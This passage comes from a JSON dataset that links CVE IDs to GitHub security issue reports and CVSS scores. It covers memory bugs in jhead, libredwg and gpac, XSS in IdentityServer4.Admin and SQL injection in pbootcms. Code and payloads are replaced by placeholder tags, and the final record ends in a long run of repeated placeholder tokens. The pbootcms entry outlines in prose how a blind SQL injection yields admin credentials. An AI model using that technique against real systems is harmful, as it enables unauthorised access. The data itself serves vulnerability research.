  64675. "exploitabilityScore": 3.9
  64676. },
  64677. {
  64678. "CVE_ID": "CVE-2021-28233",
  64679. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/11",
  64680. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/11",
  64681. "Repo_new": "brackeen/ok-file-formats",
  64682. "Issue_Created_At": "2021-03-05T13:29:01Z",
  64683. "description": "heap buffer overflow in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command APITAG Result APITAG Although the results of the running are correct, when I used our vulnerability detection tool to detect, I found that a heap buffer overflow occurred in line NUMBERTAG Looking Description for detailed description. Description When I used gdb for debugging with the following command\uff1a APITAG Obtaining the start address and size of the decoder with the help of the above command\uff0cwhich explaining that the valid address range of the decoder is in FILETAG .",
  64684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64685. "severity": "HIGH",
  64686. "baseScore": 8.8,
  64687. "impactScore": 5.9,
  64688. "exploitabilityScore": 2.8
  64689. },
  64690. {
  64691. "CVE_ID": "CVE-2021-28236",
  64692. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/324",
  64693. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/324",
  64694. "Repo_new": "libredwg/libredwg",
  64695. "Issue_Created_At": "2021-03-03T09:19:26Z",
  64696. "description": "Four NULL dereference in out_dxfb.c. I found four NULL dereference bugs in the current master NUMBERTAG d2c NUMBERTAG f). Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG",
  64697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64698. "severity": "HIGH",
  64699. "baseScore": 7.5,
  64700. "impactScore": 3.6,
  64701. "exploitabilityScore": 3.9
  64702. },
  64703. {
  64704. "CVE_ID": "CVE-2021-28237",
  64705. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/325",
  64706. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/325",
  64707. "Repo_new": "libredwg/libredwg",
  64708. "Issue_Created_At": "2021-03-04T04:20:26Z",
  64709. "description": "Heap buffer overflow in APITAG I found a heap buffer overflow in the current master NUMBERTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command APITAG ASAN report ERRORTAG POC FILETAG",
  64710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64711. "severity": "CRITICAL",
  64712. "baseScore": 9.8,
  64713. "impactScore": 5.9,
  64714. "exploitabilityScore": 3.9
  64715. },
  64716. {
  64717. "CVE_ID": "CVE-2021-28242",
  64718. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/109",
  64719. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/109",
  64720. "Repo_new": "b2evolution/b2evolution",
  64721. "Issue_Created_At": "2021-02-26T10:12:06Z",
  64722. "description": "Responsible Disclosure Security Issue. Hi Team, We have identified a Critical security issue and we would like to report back to you since it is supposed to fixed ASAP . We tried to contact you via the b2evolution forum. Since there was no response just trying to reach you via all mode. Kindly help us with your mail id so we can report it directly to the correct person as part of responsible disclosure.",
  64723. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64724. "severity": "HIGH",
  64725. "baseScore": 8.8,
  64726. "impactScore": 5.9,
  64727. "exploitabilityScore": 2.8
  64728. },
  64729. {
  64730. "CVE_ID": "CVE-2021-28245",
  64731. "Issue_Url_old": "https://github.com/M40k1n9/vulner/issues/1",
  64732. "Issue_Url_new": "https://github.com/m40k1n9/vulner/issues/1",
  64733. "Repo_new": "m40k1n9/vulner",
  64734. "Issue_Created_At": "2021-03-09T07:34:55Z",
  64735. "description": "pbootcms. APITAG NUMBERTAG has SQL injection Vulnerability Type : SQL Injection Vulnerability Version NUMBERTAG Recurring environment: Windows NUMBERTAG PHP NUMBERTAG Apache NUMBERTAG Mysql NUMBERTAG ulnerability Description AND recurrence: The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG image URLTAG Boolean based\u00a0blind\u00a0SQL\u00a0injection happened in this page. '$_ POST' sends an index array. The values in the array are brought into the \"where\" condition in the form of \"and\". image URLTAG When the condition is true: image URLTAG image URLTAG When the condition is false: image URLTAG image URLTAG payload: Because the data is filtered, only 'regexp' can be used for regular matching. image URLTAG image URLTAG and we can get the admin account name and password Detailed information NUMBERTAG ulnerability PATHTAG image URLTAG When the passed in parameter $where is an array, traverse the array, and when $where is an index APITAG APITAG the code to pass in the \u2018where\u2019 function as an index array: PATHTAG In APITAG the incoming data is assigned to the variable \"$receive\" for traversal, and \"$key\" is brought into APITAG for filtering. image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG The values of the index array passed in through the above methods can only contain Chinese, letters, numbers, horizontal lines, dots, commas and spaces! It is encoded by APITAG and APITAG Finally, it is passed to '$where3'. image URLTAG image URLTAG image URLTAG The '$where3' in APITAG is controllable, and it will be brought into the statement in the form of 'and'.",
  64736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64737. "severity": "HIGH",
  64738. "baseScore": 7.5,
  64739. "impactScore": 3.6,
  64740. "exploitabilityScore": 3.9
  64741. },
  64742. {
  64743. "CVE_ID": "CVE-2021-28275",
  64744. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/17",
  64745. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/17",
  64746. "Repo_new": "matthias-wandel/jhead",
  64747. "Issue_Created_At": "2021-02-26T08:09:28Z",
  64748. "description": "Multiple Segmentation fault in jhead via a crafted jpg file. Description of problem: Multiple Segmentation fault in jhead via a crafted jpg file Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command Segmentation fault in APITAG APITAG Segmentation fault in Get NUMBERTAG u APITAG Segmentation fault in Get NUMBERTAG s APITAG poc\uff1a FILETAG They are all because of wild addr read. Actual results: Segmentation fault in APITAG ERRORTAG Segmentation fault in Get NUMBERTAG u ERRORTAG Segmentation fault in Get NUMBERTAG s ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64749. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64750. "severity": "MEDIUM",
  64751. "baseScore": 5.5,
  64752. "impactScore": 3.6,
  64753. "exploitabilityScore": 1.8
  64754. },
  64755. {
  64756. "CVE_ID": "CVE-2021-28277",
  64757. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/16",
  64758. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/16",
  64759. "Repo_new": "matthias-wandel/jhead",
  64760. "Issue_Created_At": "2021-02-26T08:06:21Z",
  64761. "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64762. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64763. "severity": "HIGH",
  64764. "baseScore": 7.8,
  64765. "impactScore": 5.9,
  64766. "exploitabilityScore": 1.8
  64767. },
  64768. {
  64769. "CVE_ID": "CVE-2021-28278",
  64770. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/15",
  64771. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/15",
  64772. "Repo_new": "matthias-wandel/jhead",
  64773. "Issue_Created_At": "2021-02-26T08:04:46Z",
  64774. "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64775. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64776. "severity": "HIGH",
  64777. "baseScore": 7.8,
  64778. "impactScore": 5.9,
  64779. "exploitabilityScore": 1.8
  64780. },
  64781. {
  64782. "CVE_ID": "CVE-2021-28290",
  64783. "Issue_Url_old": "https://github.com/skoruba/IdentityServer4.Admin/issues/813",
  64784. "Issue_Url_new": "https://github.com/skoruba/identityserver4.admin/issues/813",
  64785. "Repo_new": "skoruba/identityserver4.admin",
  64786. "Issue_Created_At": "2021-03-11T17:17:35Z",
  64787. "description": "XSS issue in Client Secrets and Api Resource Secrets. In the views APITAG and APITAG is not HTML encoded data attribute APITAG on the button: APITAG This data attribute is used in the dialog with secret detail. Fix: CODETAG I will send this fix asap. Thanks to Silton Santos for reporting.",
  64788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64789. "severity": "MEDIUM",
  64790. "baseScore": 6.1,
  64791. "impactScore": 2.7,
  64792. "exploitabilityScore": 2.8
  64793. },
  64794. {
  64795. "CVE_ID": "CVE-2021-28300",
  64796. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1702",
  64797. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1702",
  64798. "Repo_new": "gpac/gpac",
  64799. "Issue_Created_At": "2021-03-11T02:05:00Z",
  64800. "description": "A NULL pointer dereference in the function APITAG in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG gdb info: CODETAG ASAN info: ERRORTAG",
  64801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64802. "severity": "CRITICAL",
  64803. "baseScore": 9.8,
  64804. "impactScore": 5.9,
  64805. "exploitabilityScore": 3.9
  64806. },
  64807. {
  64808. "CVE_ID": "CVE-2021-28302",
  64809. "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/249",
  64810. "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/249",
  64811. "Repo_new": "pupnp/pupnp",
  64812. "Issue_Created_At": "2021-03-12T02:54:55Z",
  64813. "description": "Too many nested tags will lead to stack space exhaustion, resulting in signal NUMBERTAG SIGSEGV). hi, this poc caused a crash. When parsing xml, if there if too many \" APITAG \" in it ,that causes a crash. The problem is in the function APITAG \uff0c After parses all < a >, it can't find the closed node, and finally enters the errorhandler. When using APITAG When releases APITAG APITAG will release the child node APITAG recursively, which will consume stack space. If the recursive depth is not limited, it will cause crash. POC and crash are below. I suggest adding an interface that limits the depth of recursion. the stack size of my device $ulimit s NUMBERTAG poc: CODETAG android crash tombstone: Build fingerprint: PATHTAG format APITAG keys' Revision NUMBERTAG ABI: 'arm' Timestamp NUMBERTAG pid NUMBERTAG tid NUMBERTAG name: Thread NUMBERTAG APITAG <<< uid NUMBERTAG signal NUMBERTAG SIGSEGV), code NUMBERTAG SEGV_ACCERR), fault addr NUMBERTAG bd NUMBERTAG ff8 r0 b NUMBERTAG r NUMBERTAG bf1f r2 eca NUMBERTAG r NUMBERTAG a r4 b NUMBERTAG r NUMBERTAG c r NUMBERTAG r NUMBERTAG c r8 dbf NUMBERTAG c r9 dbf NUMBERTAG r NUMBERTAG a r NUMBERTAG dbf NUMBERTAG ip c NUMBERTAG e NUMBERTAG sp bd NUMBERTAG lr c NUMBERTAG pc c NUMBERTAG backtrace NUMBERTAG pc NUMBERTAG PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG 
d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d 
PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG APITAG NUMBERTAG pc NUMBERTAG d PATHTAG APITAG APITAG 